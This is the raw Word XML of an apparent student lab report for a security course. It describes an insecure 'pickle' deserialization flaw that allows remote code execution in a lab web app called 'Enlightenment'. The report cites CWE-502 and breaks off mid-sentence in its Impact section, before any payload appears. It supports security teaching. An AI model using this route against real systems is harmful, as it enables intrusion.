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B50D" w14:textId="3DEA108C" w:rsidR="00B0390B" w:rsidRPr="00A7675D" w:rsidRDefault="3EE847B1" w:rsidP="00BD6154">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>CSOC 10</w:t>
      </w:r>
      <w:r w:rsidR="00033640" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">0: </w:t>
      </w:r>
      <w:r w:rsidR="001D2509" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Assignment #</w:t>
      </w:r>
      <w:r w:rsidR="004452AF" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566182C0" w14:textId="4AF7CF47" w:rsidR="00B0390B" w:rsidRPr="00A7675D" w:rsidRDefault="00CB052D" w:rsidP="00BD6154">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>October 5</w:t>
      </w:r>
      <w:r w:rsidR="3EE847B1" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, 202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51385712" w14:textId="77777777" w:rsidR="00B0390B" w:rsidRPr="00A7675D" w:rsidRDefault="00B0390B" w:rsidP="00BD6154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5081F98D" w14:textId="1373691B" w:rsidR="00B0390B" w:rsidRPr="00A7675D" w:rsidRDefault="00B0390B" w:rsidP="00BD6154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared By: </w:t>
      </w:r>
      <w:r w:rsidR="00457C4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ashish Hedau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225623C7" w14:textId="77777777" w:rsidR="00163836" w:rsidRPr="00A7675D" w:rsidRDefault="00163836" w:rsidP="00B0390B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48654649" w14:textId="77777777" w:rsidR="00B0390B" w:rsidRPr="00A7675D" w:rsidRDefault="00B0390B" w:rsidP="006A5F39">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-1415546591"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="12E70565" w14:textId="3A011006" w:rsidR="00930EBB" w:rsidRPr="00A7675D" w:rsidRDefault="00930EBB">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00A7675D">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0B6B3BC1" w14:textId="4C33FDAE" w:rsidR="004D4858" w:rsidRDefault="00930EBB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00A7675D">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00A7675D">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00A7675D">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc147692929" w:history="1">
            <w:r w:rsidR="004D4858" w:rsidRPr="00DB08DC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Unsecure deserialization due to ‘pickle’ use affecting </w:t>
            </w:r>
            <w:r w:rsidR="004D4858" w:rsidRPr="00DB08DC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>‘</w:t>
            </w:r>
            <w:r w:rsidR="004D4858" w:rsidRPr="00DB08DC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Enlightenment</w:t>
            </w:r>
            <w:r w:rsidR="004D4858" w:rsidRPr="00DB08DC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">’ </w:t>
            </w:r>
            <w:r w:rsidR="004D4858" w:rsidRPr="00DB08DC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>leading to Remote Code Execution</w:t>
            </w:r>
            <w:r w:rsidR="004D4858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D4858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D4858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc147692929 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D4858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D4858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D4858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="004D4858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BE01BEE" w14:textId="572B3174" w:rsidR="004D4858" w:rsidRDefault="004D4858">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc147692930" w:history="1">
            <w:r w:rsidRPr="00DB08DC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>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_Toc147692930 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F9C3182" w14:textId="207EC60B" w:rsidR="004D4858" w:rsidRDefault="004D4858">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc147692931" w:history="1">
            <w:r w:rsidRPr="00DB08DC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc147692931 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36241CF9" w14:textId="6808FC4F" w:rsidR="004D4858" w:rsidRDefault="004D4858">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc147692932" w:history="1">
            <w:r w:rsidRPr="00DB08DC">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_Toc147692932 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="227840A5" w14:textId="5A7B384D" w:rsidR="004D4858" w:rsidRDefault="004D4858">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc147692933" w:history="1">
            <w:r w:rsidRPr="00DB08DC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Steps to Reproduce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc147692933 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A54B8A7" w14:textId="3254953F" w:rsidR="004D4858" w:rsidRDefault="004D4858">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc147692934" w:history="1">
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc147692934 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43C6B63A" w14:textId="1F3CE025" w:rsidR="00930EBB" w:rsidRPr="00A7675D" w:rsidRDefault="00930EBB">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00A7675D">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="712E4D82" w14:textId="07C499F4" w:rsidR="00B0390B" w:rsidRPr="00A7675D" w:rsidRDefault="00B0390B" w:rsidP="006A5F39">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4398A1A2" w14:textId="32698CA3" w:rsidR="00930EBB" w:rsidRPr="00A7675D" w:rsidRDefault="00930EBB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD7A272" w14:textId="7093824B" w:rsidR="00123DCA" w:rsidRPr="00A7675D" w:rsidRDefault="004165A5" w:rsidP="00782E20">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc147692929"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Unsecure deserialization</w:t>
      </w:r>
      <w:r w:rsidR="008D4BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to ‘pickle’ use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> affecting </w:t>
      </w:r>
      <w:r w:rsidR="00BD0F56">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00BD0F56" w:rsidRPr="00BD0F56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enlightenment</w:t>
      </w:r>
      <w:r w:rsidR="00BD0F56">
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>leading to Remote Code Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="76262C90" w14:textId="77777777" w:rsidR="00782E20" w:rsidRPr="00A7675D" w:rsidRDefault="00782E20" w:rsidP="00782E20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14BC6420" w14:textId="77777777" w:rsidR="00123DCA" w:rsidRPr="00A7675D" w:rsidRDefault="3EE847B1" w:rsidP="0071459E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc147692930"/>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="03EAE132" w14:textId="2185DDA0" w:rsidR="00C70ED3" w:rsidRDefault="0005062F" w:rsidP="00002453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The assessed web application in scope ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="0005062F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://10.5.50.40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>’ ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="0005062F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enlightenment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>’ features a landing page which asks users to submit a name to get ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="005B29FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>salvation’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, it contains a critical vulnerability related to unsecure deserialization in the endpoint </w:t>
      </w:r>
      <w:r w:rsidRPr="0005062F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0005062F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0005062F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/enlightenment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00774C80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CWE-502</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Deserialization of Untrusted Data) </w:t>
      </w:r>
      <w:r w:rsidR="00914862">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>says “It is often convenient to serialize objects for communication or save them for later use. However, deserialized data or code can often be modified without sufficiently verifying that the resulting data will be valid.” This untrusted data could contain malicious code which can result in Arbitrary Command Execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144D13D2" w14:textId="35DC66F4" w:rsidR="00774C80" w:rsidRDefault="00774C80" w:rsidP="00002453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Read more about CWE-502: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="004210AC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>https://cwe.mitre.org/data/definitions/502.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48238903" w14:textId="77777777" w:rsidR="007356F4" w:rsidRPr="00774C80" w:rsidRDefault="007356F4" w:rsidP="00123DCA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE8F101" w14:textId="59BA0B3A" w:rsidR="00123DCA" w:rsidRPr="00A7675D" w:rsidRDefault="3EE847B1" w:rsidP="0071459E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc147692931"/>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="4A37C789" w14:textId="79FA9770" w:rsidR="00C70ED3" w:rsidRPr="00A7675D" w:rsidRDefault="00914862" w:rsidP="00002453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker can create a malicious serialized object as provided in the settings.py class </w:t>
      </w:r>
      <w:r w:rsidR="00002453">
        <w:rPr>
